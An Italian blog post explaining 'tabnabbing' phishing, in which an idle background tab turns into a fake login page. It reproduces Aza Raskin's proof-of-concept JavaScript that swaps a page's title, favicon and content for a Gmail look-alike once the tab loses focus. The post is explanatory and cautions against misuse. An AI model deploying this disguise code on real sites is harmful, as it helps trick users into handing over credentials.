My You Tube channel

|
Categoria: Coding
|
articoli tecnici sicurezza informatica hacking

Quando si tratta di rubare, l'ingegno si aguzza sempre a quanto pare. Infatti non è più necessario cliccare il solito link fasullo per rischiare di essere vittima di furto di credenziali ora basta visitare o credere di farlo, una pagina anche importante, totalmente innocua, almeno per un po'.

La vulnerabilità sfruttata è nell'utente e non nello strumento informatico. Abusa della distrazione e della confusione che creiamo navigando e continuando ad aprire schede.
In sostanza la pagina, una volta perso il focus, muterà il suo aspetto, diventando la pagina phishing di un qualsiasi servizio, hotmail, paypal, ebay, postepay e via dicendo, ritrovandola potreste pensare ad un collegamento richiesto e non riuscito in precedenza ed inserirete i dati, che ovviamente prenderanno una strada diversa da quella che vi aspettereste, le vostre credenziali... non sono più un segreto, almeno per il phisher.
Per recuperare i vostri soldi useranno il solito metodo descritto più volte. Ho la conferma che è ancora in uso perchè solo ieri hanno dato notizia di studenti di un liceo milanese che in complicità con un gruppo rumeno avevano organizzato proprio questo sistema di recupero di somme provenienti da furti online.
Altra documentazione la trovate su Wikipedia
Ora qualcosa di più tecnico, il codice:

Copyright (c) 2010 Aza Raskin - http://azarask.in
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

(function(){

var TIMER = null;
var HAS_SWITCHED = false;

// Events
window.onblur = function(){
TIMER = setTimeout(changeItUp, 5000);
}

window.onfocus = function(){
if(TIMER) clearTimeout(TIMER);
}

// Utils
function setTitle(text){ document.title = text; }

// This favicon object rewritten from:
// Favicon.js - Change favicon dynamically [http://ajaxify.com/run/favicon].
// Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox and Opera.

favicon = {
docHead: document.getElementsByTagName("head")[0],
set: function(url){
this.addLink(url);
},

addLink: function(iconURL) {
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = iconURL;
this.removeLinkIfExists();
this.docHead.appendChild(link);
},

removeLinkIfExists: function() {
var links = this.docHead.getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
this.docHead.removeChild(link);
return; // Assuming only one match at most.
}
}
},

get: function() {
var links = this.docHead.getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
return link.href;
}
}
}
};


function createShield(){
div = document.createElement("div");
div.style.position = "fixed";
div.style.top = 0;
div.style.left = 0;
div.style.backgroundColor = "white";
div.style.width = "100%";
div.style.height = "100%";
div.style.textAlign = "center";
document.body.style.overflow = "hidden";

img = document.createElement("img");
img.style.paddingTop = "15px";
img.src = "http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png";

var oldTitle = document.title;
var oldFavicon = favicon.get() || "/favicon.ico";

div.appendChild(img);
document.body.appendChild(div);
img.onclick = function(){
div.parentNode.removeChild(div);
document.body.style.overflow = "auto";
setTitle(oldTitle);
favicon.set(oldFavicon)
}

}

function changeItUp(){
if( HAS_SWITCHED == false ){
createShield("https://mail.google.com");
setTitle( "Gmail: Email from Google");   
favicon.set("https://mail.google.com/favicon.ico");
HAS_SWITCHED = true;   
}
}

})();

Per giustizia e gratitudine :) ... non avendo voglia di riscrivermi tutto il codice, l'ho grabbato al buon Sergetto, grazie quindi anche a lui. Mi raccomando, usatelo a scopo di studio o come idea illuminante per perseguire nuove strade di ricerca, ... non sta a me ricordarvi che l'uso malevolo comporta sanzioni penali, e non da poco.

Multirotori

 Multicopters I miei droni multirotore. Una semplice curiosità diventata una passione e qualcosa di più.
Il punto di incontro tra programmazione, volo, arduino, tecnica e manualità ...stimolante!
Consigli ed esperienze realizzative di vari modelli dedicati sia al divertimento che all'uso professionale.

Joomla

 Joomla! Un Framework promettente ed un collaudato CMS che, con l'adeguata conoscenza, può diventare un avanzato strumento di lavoro.
Come si può conoscere uno strumento se non usandolo, sperimentando sempre nuove soluzioni e seguendo le sue problematiche di sicurezza?

Lifehacking

 Lifehacking Non c'è oggetto per casa che non ho aperto, è maniacale ma non riesco a rinunciare, come se quelle quattro viti, quella fessura a scatto mi impedisse di conoscere, scoprire, imparare qualcosa, sigillandolo come un segreto.
Tutto può funzionare meglio o diventare più utile e versatile ...è Life Hacking!

Parapendio

 Parapendio Volare è un po' come avere la possibilità di osservare le cose da un'altra prospettiva, senza i vincoli di una forza che ti costringe a muoverti come un pedone degli scacchi per le strade di una città. Il mio sogno sta nell'armadio, pronto a farmi evadere quando ne sento il bisogno e l'aria lo permette.
© 2024 Spazioalchimia

Oggi sono passate a trovarmi 0 persone che hanno visitato 0 pagine.

Back to Top